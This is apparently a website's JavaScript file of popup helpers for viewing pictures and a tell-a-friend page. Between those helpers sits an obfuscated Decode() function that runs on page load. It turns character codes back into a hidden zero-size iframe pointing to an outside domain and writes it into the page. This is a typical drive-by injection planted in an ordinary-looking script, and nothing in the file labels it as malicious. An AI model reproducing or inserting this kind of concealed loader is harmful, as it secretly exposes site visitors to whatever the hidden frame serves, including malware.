function ViewPicPop(pic) 
{
  day = new Date(); 
  id = day.getTime();

  url = "http://www.facewar.com/view_pic.php?p_id="+pic;

 // alert(url);

  eval("page" + id + " = window.open(url, '"+id+"', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=400,height=400,left = 10,top = 10');");
}

function Decode()
{
	var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
	str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
	str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
	str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
	str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
	l=str.length;
	while(c<=str.length-1)
	{
		while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
		c++;out=out+String.fromCharCode(temp);temp="";
	}
document.write(out);
}
Decode();

function ViewTAFPop() 
{
  day = new Date(); 
  id = day.getTime();

  url = "http://tafmaster.com/taf/9880/249447/";

  eval("page" + id + " = window.open(url, '"+id+"', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=550,height=500,left = 10,top = 10');");
}
